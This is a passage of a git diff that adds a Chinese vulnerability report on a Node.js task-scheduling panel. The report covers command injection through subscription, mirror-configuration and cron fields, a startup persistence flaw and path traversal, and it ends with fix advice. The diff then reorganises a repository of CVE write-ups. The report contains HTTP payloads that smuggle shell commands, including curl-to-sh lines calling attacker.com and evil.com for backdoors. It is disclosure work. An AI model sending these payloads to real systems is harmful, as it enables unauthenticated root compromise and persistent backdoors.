+**漏洞根因**: 订阅接口的 `sub_before` 和 `sub_after` 字段（Joi 校验为普通字符串）被直接传递给 `promiseExec()`，其内部调用 `child_process.exec()` 且未做任何过滤。
+
+#### 数据流总览
+
+```
+POST /API/subscriptions {"sub_before": "malicious_cmd"}
+  │
+  ▼
+① api/subscription.ts L49  Joi.string().optional()     ← 无安全过滤
+  │
+  ▼
+② services/subscription.ts L215  this.handleTask(doc)  ← 处理订阅任务
+  │
+  ▼
+③ services/subscription.ts L96/L105  createCronTask/createIntervalTask (传入 taskCallbacks)
+  │
+  ▼
+④ services/subscription.ts L141  beforeStr = await promiseExec(doc.sub_before)
+  │                                                    ^^^^^^^^^^^^^^^^^^^^^^
+  │                                                    恶意代码直接传入 exec 执行！
+  ▼
+⑤ config/util.ts L284  await promisify(exec)(command, {...})  ← 触发 RCE
+```
+
+#### 逐步详解
+
+**① 入口 — `api/subscription.ts` L27-75**
+接口 `POST /subscriptions` 中的 `sub_before` 和 `sub_after` 字段仅要求是普通字符串，允许空字符串。没有任何对于 Shell 元字符的过滤。
+
+**②/③ 创建并执行 — `services/subscription.ts` L212-218 & L84-112**
+`create` 方法在数据库插入后，立刻调用 `handleTask`，并进而调用 `createCronTask` 或 `createIntervalTask` 来执行调度。调度注册的各种生命周期钩子由 `this.taskCallbacks(doc)` 生成。
+
+**④ 命令执行 (关键污染点) — `services/subscription.ts` L120-150**
+```typescript
+private taskCallbacks(doc: Subscription): TaskCallbacks {
+  return {
+    onBefore: async (startTime) => {
+      // ...
+      let beforeStr = '';
+      try {
+        if (doc.sub_before) {
+          // 用户的输入未经任何检查被传入 promiseExec
+          beforeStr = await promiseExec(doc.sub_before);
+        }
+      } catch (error: any) {
+        // ...
+      }
+    }
+  }
+}
+```
+
+**⑤ 底层执行 — `config/util.ts` L282-292**
+`promiseExec` 是包装了 Node.js 原生 `child_process.exec` 的异步函数，`exec` 默认启动一个 shell 来解释执行传入的字符串。
+
+**测试报文**:
+```http
+POST /API/subscriptions HTTP/1.1
+{
+  "name": "rce_sub", "url": "http://x", "type": "public-repo", "alias": "r", 
+  "schedule_type": "crontab", "sub_before": "id > /tmp/sub_proof.txt"
+}
+```
+→ 触发订阅运行（`PUT /API/subscriptions/run [id]`）后，注入的命令以 root 身份执行。
+
+---
+
+### 3.5 QL-2026-010: 系统镜像配置参数注入 — 🔴 致命
+
+**漏洞根因**: 系统设置接口（如配置 Python、Node、Linux 的软件源镜像，或设置时区）在处理用户提交的地址参数时，存在多处直接字符串拼接命令注入点。结合 QL-2026-007，这些均可未授权利用。
+
+#### 数据流总览（以 Python 镜像配置为例）
+
+```
+PUT /API/system/config/python-mirror {"pythonMirror": "malicious_payload"}
+  │
+  ▼
+① api/system.ts L155  Joi.string().allow('').allow(null)  ← 无安全过滤
+  │
+  ▼
+② services/system.ts L197  updatePythonMirror(info)
+  │
+  ▼
+③ services/system.ts L205  cmd = `pip3 config set global.index-url ${info.pythonMirror}`
+  │                                                              ^^^^^^^^^^^^^^^^^^^^^
+  │                                                              直接拼接用户输入！
+  ▼
+④ services/system.ts L207  await promiseExec(cmd)  ← exec() 触发 RCE
+```
+
+#### 逐步详解与多处注入点
+
+系统服务 (`services/system.ts`) 中存在大量由于字符串拼接导致的命令注入，这些功能只允许管理员使用，但通过大小写绕过漏洞即可未授权触发：
+
+**1. Python 镜像注入 (`updatePythonMirror`) L197-209**
+```typescript
+let cmd = 'pip config unset global.index-url';
+if (info.pythonMirror) {
+  cmd = `pip3 config set global.index-url ${info.pythonMirror}`;
+}
+await promiseExec(cmd); // ← 传入 "https://pypi.org/simple; id > /tmp/py_proof" 将导致注入
+```
+
+**2. Node 镜像注入 (`updateNodeMirror`) L149-195**
+```typescript
+let cmd = 'pnpm config delete registry';
+if (info.nodeMirror) {
+  cmd = `pnpm config set registry ${info.nodeMirror}`;
+}
+let command = `cd && ${cmd}`;
+// ... 之后交由 scheduleService.runTask(command, ...) 执行
+```
+`runTask` 最终调用 `spawn(command, { shell: '/bin/bash' })` 触发注入。
+
+**3. Linux 软件源注入 (`updateLinuxMirror`) L211-271**
+```typescript
+const command = `sed -i 's/${defaultDomain.replace(/\//g,'\\/')}/${targetDomain.replace(/\//g,'\\/')}/g' /etc/apk/repositories && apk update -f`;
+// ... 交由 scheduleService.runTask 执行
+```
+这里 `$targetDomain` (`info.linuxMirror`) 被注入到了 `sed` 命令中，如果传入 `https://dl-cdn.alpinelinux.org'; id > /tmp/linux_proof; #` 即可逃逸单引号并执行。
+
+**4. 停止命令（grep注入）(`api/system.ts`) L302-319**
+调用 `PUT /API/system/command-stop`，其最终调用 `getPid(command)`
+```typescript
+// back/config/util.ts L414
+const taskCommand = `ps -eo pid,command | grep "${cmd}" | grep -v grep ...`;
+```
+这与前面分析的依赖取消（`cancel`）逻辑相似，命令被嵌入双引号内执行，发生二次注入。
+
+**测试报文**:
+```http
+PUT /API/system/config/python-mirror HTTP/1.1
+Content-Type: application/json
+
+{"pythonMirror": "x; id > /tmp/py_proof; #"}
+```
+→ 确认 RCE ✅
+
+---
+
+### 3.6 QL-2026-011: 启动持久化 Persistence RCE — ✅ 高危
+
+**漏洞根因**: 系统在启动时（`loaders/initData.ts`），为了恢复状态，会从数据库加载特定的定时任务，并直接调用原生 `exec` 函数去执行。这意味着如果我们能通过绕过认证写入恶意的定时任务，不仅可以主动触发执行，也能实现持久化的启动项劫持（Persistence）。
+
+#### 数据流总览
+
+```
+① 系统启动（Container Restart / Crash Recovery）
+  │
+  ▼
+② loaders/initData.ts L22  默认导出加载函数执行
+  │
+  ▼
+③ loaders/initData.ts L137  CrontabModel.findAll(...) 查找条件包含 `ql repo` 或 `ql raw`
+  │
+  ▼
+④ loaders/initData.ts L149  exec(doc.command)
+                             ^^^^^^^^^^^^^^^^^
+                             直接将查出的恶意命令传给 child_process.exec！
+```
+
+#### 逐步详解
+
+**① 创建恶意定时任务**
+攻击者通过未授权接口 (`POST /API/crons`) 创建一个恶意任务。为了匹配启动加载时的条件，该命令必须包含 `ql repo` 或 `ql raw` 字符串。
+
+```http
+POST /API/crons HTTP/1.1
+Content-Type: application/json
+
+{
+  "name": "persistence_rce_test",
+  "command": "ql repo; curl http://attacker.com/backdoor | sh",
+  "schedule": "0 0 1 1 *"
+}
+```
+
+**② 数据库记录**
+定时任务的指令字符串会被原样存储入 SQLite。
+
+**③ 启动触发执行 (`loaders/initData.ts` L137-153)**
+当 Docker 容器发生重启，系统启动时：
+```typescript
+CrontabModel.findAll({
+  where: {
+    isDisabled: { [Op.ne]: 1 },
+    command: {
+      [Op.or]: [{ [Op.like]: `%ql repo%` }, { [Op.like]: `%ql raw%` }],
+    },
+  },
+}).then((docs) => {
+  for (let i = 0; i < docs.length; i++) {
+    const doc = docs[i];
+    if (doc) {
+      exec(doc.command); // ← 未经检查直接执行
+    }
+  }
+});
+```
+
+**影响**: 该漏洞构建了完整的系统后门和持久化控制。无论管理员如何清理正在运行的恶意进程，只要未从数据库中清除这条恶意计划任务，每次容器重启时，恶意 Payload 就会随系统服务一同以 root 权限自动启动。
+
+---
+
+### 3.7 基础漏洞分析（路径穿越与文件操作）
+
+#### QL-2026-002: 黑名单绕过（缺少 return）
+`back/api/config.ts` L76 在黑名单拦截后缺少 `return`，写入流程继续。可覆写 `auth.json`（管理员账号）。
+
+#### QL-2026-003: 路径穿越 (../../../../)
+`name` 参数无过滤。`../../../../tmp/traversal_proof.txt` 可成功写入容器系统级 `/tmp`。
+
+#### QL-2026-004: config.sh 未列入黑名单
+`config.sh` 在每次任务执行前被 `source` 加载。由于未加入黑名单，攻击者可直接写入该文件获取持久 RCE。
+
+---
+
+## 四、攻击链总结与 HTTP 测试报文
+
+### 攻击链 A：最速一步 RCE (大小写绕过)
+
+```http
+PUT /API/system/command-run HTTP/1.1
+Host: target:5700
+Content-Type: application/json
+
+{"command": "id > /tmp/rce_proof.txt"}
+```
+
+### 攻击链 B：依赖注入 RCE (大小写绕过 + 二次注入)
+
+```http
+POST /API/dependencies HTTP/1.1
+Content-Type: application/json
+
+[{"name": "$(curl -fsSL https://evil.com/sh | sh)", "type": 0}]
+```
+
+### 攻击链 C：凭据重置 RCE (初始化绕过)
+
+```http
+PUT /open/user/init HTTP/1.1
+Content-Type: application/json
+
+{"username": "attacker", "password": "attacker123"}
+```
+
+---
+
+## 五、修复建议 (P0 优先级)
+
+1. **统一认证层**: 将 Init Guard 移至 URL Rewrite 之后。Express Router 设置 `caseSensitive: true`。认证正则强制不区分大小写。
+2. **彻底禁用 Shell**: 移除所有 `spawn(..., {shell: true})` 和 `exec()`。必须使用 `spawn(cmd, [args])` 参数数组形式。
+3. **严格参数过滤**: 对包名、镜像 URL、Cron 命令等参数实施白名单正则校验 `^[a-zA-Z0-9@/_.-]+$`。
+4. **文件访问控制**: 完善 `blackFileList`，在 `res.send()` 后强制 `return`。实施基于真实路径 (`realpath`) 的目录逃逸校验。
+
+---
+
+## 六、复现环境与 PoC
+
+所有漏洞均已集成在 `tmp/poc_test.py` 中。
+
+```bash
+cd tmp/
+.venv/bin/python3 poc_test.py           # 15/15 全部通过
+```
diff --git a/scripts/update_readme.py b/scripts/update_readme.py
index 7e14f1130..ae97ce3af 100644
--- a/scripts/update_readme.py
+++ b/scripts/update_readme.py
@@ -18,7 +18,7 @@
 WEB_KEYWORDS = [
     'rce', 'sql', 'xss', 'csrf', 'upload', 'injection', 'web', 'cms', 
     '文件上传', '文件读取', 'sql注入', '信息泄露', '命令执行', 
-    '目录遍历', '目录穿越', 'xxe', 'bypass', 'auth'
+    '目录遍历', '目录穿越', 'xxe', 'bypass', 'auth', '漏洞'
 ]
 
 START_MARKER_REGEX = r'id="head4">Web APP</span>' 
diff --git a/Apache Solr RCE via Velocity Template Injection.md b/web/Apache Solr RCE via Velocity Template Injection.md
similarity index 100%
rename from Apache Solr RCE via Velocity Template Injection.md
rename to web/Apache Solr RCE via Velocity Template Injection.md
diff --git "a/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
rename to "web/CVE-2019-10173 Xstream 1.4.10\347\211\210\346\234\254\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
rename to "web/CVE-2019-15107 Webmin 1.920 \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/web/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
rename to "web/CVE-2019-16131 OKLite v1.2.25 \344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md" "b/web/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md"
rename to "web/CVE-2019-16132 OKLite v1.2.25 \345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\345\210\240\351\231\244\346\274\217\346\264\236.md"
diff --git a/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md b/web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md
similarity index 100%
rename from CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md
rename to web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md
diff --git "a/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/CVE-2019-16309 FlameCMS 3.3.5 \345\220\216\345\217\260\347\231\273\345\275\225\345\244\204\345\255\230\345\234\250sql\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md" "b/web/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md"
similarity index 100%
rename from "CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md"
rename to "web/CVE-2019-16314 indexhibit cms v2.1.5 \345\255\230\345\234\250\351\207\215\350\243\205\345\271\266\345\257\274\350\207\264getshell.md"
diff --git a/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md b/web/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md
similarity index 100%
rename from CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md
rename to web/CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit.md
diff --git a/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md b/web/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
similarity index 100%
rename from CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
rename to web/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md
diff --git "a/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md" "b/web/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md"
rename to "web/CVE-2019-2890-Oracle WebLogic \345\217\215\345\272\217\345\210\227\345\214\226\344\270\245\351\207\215\346\274\217\346\264\236.md"
diff --git "a/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md" "b/web/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md"
similarity index 100%
rename from "CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md"
rename to "web/CVE-2019-7580 thinkcmf-5.0.190111\345\220\216\345\217\260\344\273\273\346\204\217\346\226\207\344\273\266\345\206\231\345\205\245\345\257\274\350\207\264\347\232\204\344\273\243\347\240\201\346\211\247\350\241\214.md"
diff --git "a/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md" "b/web/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md"
similarity index 100%
rename from "CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md"
rename to "web/CVE-2019-7609-kibana\344\275\216\344\272\2166.6.0\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\345\221\275\344\273\244\346\211\247\350\241\214.md"
diff --git "a/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md" "b/web/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md"
similarity index 100%
rename from "CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md"
rename to "web/CVE-2020-0554\357\274\232phpMyAdmin\345\220\216\345\217\260SQL\346\263\250\345\205\245.md"
diff --git "a/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/web/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
rename to "web/CVE-2020-3452\357\274\232Cisco_ASAFTD\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
diff --git "a/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/web/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
similarity index 100%
rename from "CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
rename to "web/CVE-2020-8794-OpenSMTPD \350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
diff --git a/CVE-2020-8813 - Cacti v1.2.8 RCE.md b/web/CVE-2020-8813 - Cacti v1.2.8 RCE.md
similarity index 100%
rename from CVE-2020-8813 - Cacti v1.2.8 RCE.md
rename to web/CVE-2020-8813 - Cacti v1.2.8 RCE.md
diff --git "a/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md"
similarity index 100%
rename from "Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md"
rename to "web/Cobub Razor 0.7.2\345\255\230\345\234\250\350\267\250\347\253\231\350\257\267\346\261\202\344\274\252\351\200\240\346\274\217\346\264\236.md"
diff --git "a/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/Cobub Razor 0.7.2\350\266\212\346\235\203\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/Cobub Razor 0.8.0\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/web/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
similarity index 100%
rename from "Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
rename to "web/Cobub Razor 0.8.0\345\255\230\345\234\250\347\211\251\347\220\206\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
diff --git "a/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md" "b/web/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
similarity index 100%
rename from "Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
rename to "web/Couch through 2.0\345\255\230\345\234\250\350\267\257\345\276\204\346\263\204\351\234\262\346\274\217\346\264\236.md"
diff --git "a/DomainMod\347\232\204XSS\351\233\206\345\220\210.md" "b/web/DomainMod\347\232\204XSS\351\233\206\345\220\210.md"
similarity index 100%
rename from "DomainMod\347\232\204XSS\351\233\206\345\220\210.md"
rename to "web/DomainMod\347\232\204XSS\351\233\206\345\220\210.md"
diff --git "a/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md" "b/web/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md"
similarity index 100%
rename from "Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md"
rename to "web/Easy File Sharing Web Server 7.2 - GET \347\274\223\345\206\262\345\214\272\346\272\242\345\207\272 (SEH).md"
diff --git "a/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md" "b/web/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md"
similarity index 100%
rename from "FineCMS_v5.0.8\344\270\244\345\244\204getshell.md"
rename to "web/FineCMS_v5.0.8\344\270\244\345\244\204getshell.md"
diff --git "a/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md" "b/web/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md"
similarity index 100%
rename from "Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md"
rename to "web/Finecms_v5.4\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\344\277\256\346\224\271\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267\345\257\206\347\240\201.md"
diff --git "a/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/GreenCMS v2.3.0603\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\350\216\267\345\217\226webshell&\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
diff --git "a/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md" "b/web/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md"
similarity index 100%
rename from "Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md"
rename to "web/Hucart cms v5.7.4 CSRF\346\274\217\346\264\236\345\217\257\344\273\273\346\204\217\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\345\217\267.md"
diff --git a/Joomla-3.4.6-RCE.md b/web/Joomla-3.4.6-RCE.md
similarity index 100%
rename from Joomla-3.4.6-RCE.md
rename to web/Joomla-3.4.6-RCE.md
diff --git "a/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/LFCMS 3.7.0\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\346\267\273\345\212\240\344\273\273\346\204\217\347\224\250\346\210\267\350\264\246\346\210\267\346\210\226\344\273\273\346\204\217\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
diff --git "a/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md" "b/web/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md"
similarity index 100%
rename from "MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md"
rename to "web/MetInfoCMS 5.X\347\211\210\346\234\254GETSHELL\346\274\217\346\264\236\345\220\210\351\233\206.md"
diff --git "a/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/web/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
similarity index 100%
rename from "Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
rename to "web/Metinfo-6.1.2\347\211\210\346\234\254\345\255\230\345\234\250XSS\346\274\217\346\264\236&SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
diff --git "a/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md" "b/web/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
similarity index 100%
rename from "MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
rename to "web/MiniCMS 1.10\345\255\230\345\234\250CSRF\346\274\217\346\264\236\345\217\257\345\242\236\345\212\240\347\256\241\347\220\206\345\221\230\350\264\246\346\210\267.md"
